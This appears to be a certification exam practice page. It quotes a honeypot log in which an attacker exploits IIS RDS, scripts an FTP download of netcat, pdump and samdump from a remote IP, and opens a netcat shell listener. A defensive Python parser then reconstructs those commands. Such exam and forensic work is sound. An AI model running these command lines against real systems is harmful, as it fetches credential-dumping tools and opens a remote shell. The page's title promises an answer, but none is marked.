EC-Council 312-49V9 Question #325: Real Exam Question with Answer & Explanation


Question

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

  "cmd1.exe /c open 213.116.251.162 >ftpcom"
  "cmd1.exe /c echo johna2k >>ftpcom"
  "cmd1.exe /c echo haxedj00 >>ftpcom"
  "cmd1.exe /c echo get nc.exe >>ftpcom"
  "cmd1.exe /c echo get pdump.exe >>ftpcom"
  "cmd1.exe /c echo get samdump.dll >>ftpcom"
  "cmd1.exe /c echo quit >>ftpcom"
  "cmd1.exe /c ftp -s:ftpcom"
  "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

Options

  • A. It is a local exploit where the attacker logs in using username johna2k
  • B. There are two attackers on the system, johna2k and haxedj00
  • C. The attack is a remote exploit and the hacker downloads three files
  • D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
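The command sequence in the stem is a classic "build a script with echo, then run it" pattern: each `echo ... >>ftpcom` line appends one line to a file that `ftp -s:ftpcom` later reads as its scripted input (host to open, then username, then password, then `get` commands), after which netcat is started as a listener. The script below is an added forensic example, not part of the original exam page: it reconstructs the `ftpcom` file from the logged commands, interprets it as an `ftp -s:` script, and flags the netcat listener. The sample log lines are constructed from the stem exactly as quoted there (the first line has no `echo`, and the parser accepts it either way); the function names and the output layout are this example's own.

```python
import re

# Constructed sample input: the RDS-executed commands quoted in the question stem.
LOG_LINES = [
    "cmd1.exe /c open 213.116.251.162 >ftpcom",
    "cmd1.exe /c echo johna2k >>ftpcom",
    "cmd1.exe /c echo haxedj00 >>ftpcom",
    "cmd1.exe /c echo get nc.exe >>ftpcom",
    "cmd1.exe /c echo get pdump.exe >>ftpcom",
    "cmd1.exe /c echo get samdump.dll >>ftpcom",
    "cmd1.exe /c echo quit >>ftpcom",
    "cmd1.exe /c ftp -s:ftpcom",
    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe",
]

CMD_RE = re.compile(r"^cmd1?\.exe\s+/c\s+(.*)$", re.IGNORECASE)
# Optional "echo", the text written, the redirection operator, the target file.
REDIR_RE = re.compile(r"^(?:echo\s+)?(.*?)\s*(>>?)\s*(\S+)$")
NC_RE = re.compile(r"^nc(?:\.exe)?\s+(.*)$", re.IGNORECASE)


def reconstruct_scripts(lines):
    """Rebuild files written through `>file` / `>>file` redirection.
    Returns {filename: [line, ...]} in write order; a single '>' truncates."""
    files = {}
    for line in lines:
        m = CMD_RE.match(line.strip())
        if not m:
            continue
        r = REDIR_RE.match(m.group(1))
        if not r:
            continue
        content, op, fname = r.groups()
        if op == ">":
            files[fname] = []
        files.setdefault(fname, []).append(content)
    return files


def parse_ftp_script(script_lines):
    """Interpret an `ftp -s:` script: after `open host`, the next two bare lines
    answer the username and password prompts; `get`/`put` lines are transfers."""
    result = {"host": None, "user": None, "password": None, "downloads": [], "uploads": []}
    for ln in script_lines:
        parts = ln.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) > 1:
            result["host"] = parts[1]
        elif verb == "user" and len(parts) > 1:
            result["user"] = parts[1]
            if len(parts) > 2:
                result["password"] = parts[2]
        elif verb in ("get", "mget") and len(parts) > 1:
            result["downloads"].extend(parts[1:])
        elif verb in ("put", "mput", "send") and len(parts) > 1:
            result["uploads"].extend(parts[1:])
        elif verb in ("quit", "bye", "binary", "ascii", "prompt", "cd", "lcd"):
            continue
        elif result["host"] is not None and result["user"] is None:
            result["user"] = ln.strip()
        elif result["host"] is not None and result["password"] is None:
            result["password"] = ln.strip()
    return result


def find_listeners(lines):
    """Flag netcat started in listen mode. `-p` gives the port, `-e` the program
    handed the connection; without `-u` netcat listens on TCP, not UDP."""
    found = []
    for line in lines:
        m = CMD_RE.match(line.strip())
        if not m:
            continue
        n = NC_RE.match(m.group(1))
        if not n:
            continue
        args = n.group(1).split()
        listen = udp = False
        port = prog = None
        i = 0
        while i < len(args):
            a = args[i]
            if a.startswith("-") and len(a) > 1:
                flags = a[1:]
                listen = listen or "l" in flags
                udp = udp or "u" in flags
                if flags.endswith("p") and i + 1 < len(args):
                    port = int(args[i + 1])
                    i += 1
                elif flags.endswith("e") and i + 1 < len(args):
                    prog = args[i + 1]
                    i += 1
            i += 1
        if listen:
            found.append({"port": port, "proto": "udp" if udp else "tcp", "exec": prog})
    return found


def summarize(lines):
    """One-shot reconstruction of what the logged command sequence did."""
    files = reconstruct_scripts(lines)
    return {
        "files_written": sorted(files),
        "ftp": parse_ftp_script(files.get("ftpcom", [])),
        "listeners": find_listeners(lines),
    }


if __name__ == "__main__":
    for key, value in summarize(LOG_LINES).items():
        print(f"{key}: {value}")
```

Run against the stem's nine commands, `summarize` shows the remote host being contacted, the username and password the attacker echoed into the script, the three files fetched, and a TCP listener on port 6969 that hands the connection to `cmd1.exe`. The same reconstruction works on any log where an attacker assembles a script line by line with `echo`, which is why it is worth keeping in a forensic toolkit.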
